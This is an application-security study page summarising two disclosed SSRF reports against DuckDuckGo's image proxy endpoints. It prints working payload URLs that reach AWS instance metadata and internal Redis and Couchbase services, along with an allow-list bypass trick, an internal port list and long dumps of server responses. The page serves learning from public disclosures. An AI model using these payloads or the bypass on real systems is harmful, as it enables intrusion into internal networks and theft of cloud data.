📙
AppSec
  • Overview
  • Write Ups Compilations/Resources
  • Main Resources
  • Labs
  • Cross Site Request Forgery
    • Cross Site Request Forgery (CSRF)
      • Write-ups
      • Source Code Examples
      • Labs
  • Missing Access Controls
    • Missing Access Controls
      • Write-ups
      • Source Code Examples
      • Resources
      • Testing Tips
  • LFI / Directory Traversal
    • Local File Inclusion
      • Local File Inclusion Writeups
      • Source Code Examples
      • Labs
  • XXE
    • XML External Entity (XXE)
      • Write-ups
      • Source Code Examples
      • Labs
      • More Writeups
      • Payloads
      • Resources
  • Injection
    • Command Injection
      • Writeups
    • Server-Side Template Injection
      • Server-Side Template Injection Writeups
      • More Write-ups
      • Source Code Examples
      • Labs
      • Resources
      • Payloads
      • Tools
    • SQL Injection
      • SQLI Write-ups
      • Source Code Examples
      • More Write-ups
      • Labs
      • Resources & Tools
  • SSRF
    • Server-Side Request Forgery (SSRF)
      • SSRF Write-ups
      • Source Code Review
  • Unvalidated Redirects and Forwards
    • Unvalidated Redirects and Forwards
      • Writeups
      • Source Code Examples
  • Verbose Error Messages and Stack Traces
    • Verbose Error Messages and Stack Traces
      • Write-ups
Powered by GitBook
On this page
  • DuckDuckGo - SSRF Access AWS Data
  • DuckDuckGo - SSRF & XSPA. Access to Redis and Couchbase db

Was this helpful?

  1. SSRF
  2. Server-Side Request Forgery (SSRF)

SSRF Write-ups

PreviousServer-Side Request Forgery (SSRF)NextSource Code Review

Last updated 4 years ago

Was this helpful?

DuckDuckGo - SSRF Access AWS Data

Researcher illustrated vulnerability on the URL:

https://proxy.duckduckgo.com/iur/?f=1&image_host=
https://proxy.duckduckgo.com/iur/?f=1&image_host=http://169.254.169.254/latest/meta-data/

Server Response:

ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/```

DuckDuckGo - SSRF & XSPA. Access to Redis and Couchbase db

Researcher discovered SSRF on the u URL parameter on endpoint https://duckduckgo.com/iu?u= . The URL parameter originally contained http://yimg.com/ . Anytime you see a URL used in a parameter like that it is a good indication that the parameter might be vulnerable to SSRF.

Original Request:

Changing URL parameter to https://google.com/ it gets rejected and returns HTTP 403 Forbidden.

Researcher discovered the URL parameter needs to contain the original yimg.com domain somewhere in the parameter. Adding that domain to the url parameter of an attacker controlled domain successfully bypasses this allow-list check and executes SSRF. In the image below the researcher used the yimg.com domain in a URL parameter q for the burp suite collaborator domain. In the Burp Collaborator Client the application can be seen reaching out over HTTP and DNS to query the attacker controlled domain.

Researcher also used this to perform XSPA and port scan internal services. Services are running on the following ports:

22
25
80
443
587
6380
6432
6767
6868
8000

Returning Redis information with the payload:https://duckduckgo.com/iu/?u=http://127.0.0.1:6868%2fstatus%2f?q=http://yimg.com/

{
  "current_time": "2018-08-23T17:56:06",
  "deployment_environment": "prod",
  "redis_local_last_successful_ping": "2018-08-23T13:56:05",
  "redis_local_url": "redis://127.0.0.1:6380",
  "redis_regional_last_successful_ping": "2018-08-23T13:56:05",
  "redis_regional_url": "redis://cache-services.duckduckgo.com:6380",
  "stat_blocked_ips_removed_since_launch": 8787,
  "stat_blocked_ips_since_launch": 12185,
  "stat_ipset_blocks": 266,
  "stat_redis_local_messages_received": 3613,
  "stat_redis_regional_messages_received": 10211,
  "status": "up"
}

Couchbase database access: https://duckduckgo.com/iu/?u=http://cache-services.duckduckgo.com:8091/pools/default/buckets?q=http://yimg.com/

[{"name":"botnet","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11213,"replicaIndex":true,"uri":"/pools/default/buckets/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","streamingUri":"/pools/default/bucketsStreaming/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","localRandomKeyUri":"/pools/default/buckets/botnet/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/botnet/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/botnet/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/botnet/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/botnet/stats","directoryURI":"/pools/default/buckets/botnet/statsDirectory","nodeStatsListURI":"/pools/default/buckets/botnet/nodes"},"ddocs":{"uri":"/pools/default/buckets/botnet/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"573aed7706bb78f1884c01efd0f10911","replicaNumber":0,"threadsNumber":3,"quota":{"ram":273678336,"rawRAM":273678336},"basicStats":{"quotaPercentUsed":18.58643023903799,"opsPerSec":518,"hitRatio":0.6626984126984127,"itemCount":208856,"memUsed":50867033},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},{"name":"deep","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11214,"replicaIndex":true,"uri":"/pools/default/buckets/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","streamingUri":"/pools/default/bucketsStreaming/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","localRandomKeyUri":"/pools/default/buckets/deep/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/deep/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/deep/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/deep/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/deep/stats","directoryURI":"/pools/default/buckets/deep/statsDirectory","nodeStatsListURI":"/pools/default/buckets/deep/nodes"},"ddocs":{"uri":"/pools/default/buckets/deep/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"f95b42373da6bd8fdd51c93324229009","replicaNumber":0,"threadsNumber":3,"quota":{"ram":4116709376,"rawRAM":4116709376},"basicStats":{"quotaPercentUsed":80.05820960337813,"opsPerSec":194,"hitRatio":0.08633093525179857,"itemCount":2326851,"memUsed":3295763821},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},{"name":"services","bucketType":"membase","authType":"none","saslPassword":"","proxyPort":11212,"replicaIndex":false,"uri":"/pools/default/buckets/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","streamingUri":"/pools/default/bucketsStreaming/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","localRandomKeyUri":"/pools/default/buckets/services/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/services/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/services/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/services/controller/startRecovery"},"nodes":[{"couchApiBase":"http://10.0.1.188:8092/services%2B06787b1d4c84027860a5f73efb508bff","systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/services/stats","directoryURI":"/pools/default/buckets/services/statsDirectory","nodeStatsListURI":"/pools/default/buckets/services/nodes"},"ddocs":{"uri":"/pools/default/buckets/services/ddocs"},"nodeLocator":"vbucket","autoCompactionSettings":false,"uuid":"06787b1d4c84027860a5f73efb508bff","vBucketServerMap":{"hashAlgorithm":"CRC","numReplicas":0,"serverList":["10.0.1.188:11210"],"vBucketMap":[[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0]]},"replicaNumber":0,"threadsNumber":3,"quota":{"ram":14271119360,"rawRAM":14271119360},"basicStats":{"quotaPercentUsed":84.70888041118592,"opsPerSec":533,"diskFetches":26,"itemCount":39777489,"diskUsed":235428957137,"dataUsed":135860040563,"memUsed":12088905432},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","touch","couchapi","cccp","xdcrCheckpointing","nodesExt","dcp"]}]```

The image_host URL Parameter is vulnerable to SSRF. AWS Metadata can be viewed at the URI . The following payload returned the AWS Metadata of the instance using the URI in the image_host URL parameter.

http://169.254.169.254/latest/meta-data/
DuckDuckGo disclosed on HackerOne: SSRF vulnerability on...HackerOne
Logo
DuckDuckGo disclosed on HackerOne: SSRF on duckduckgo.com/iu/HackerOne
Logo
Researcher illustrated using Curl
Original request returns HTTP 200
HTTP 403 returned
SSRF Executed on burpcollaborator subdomain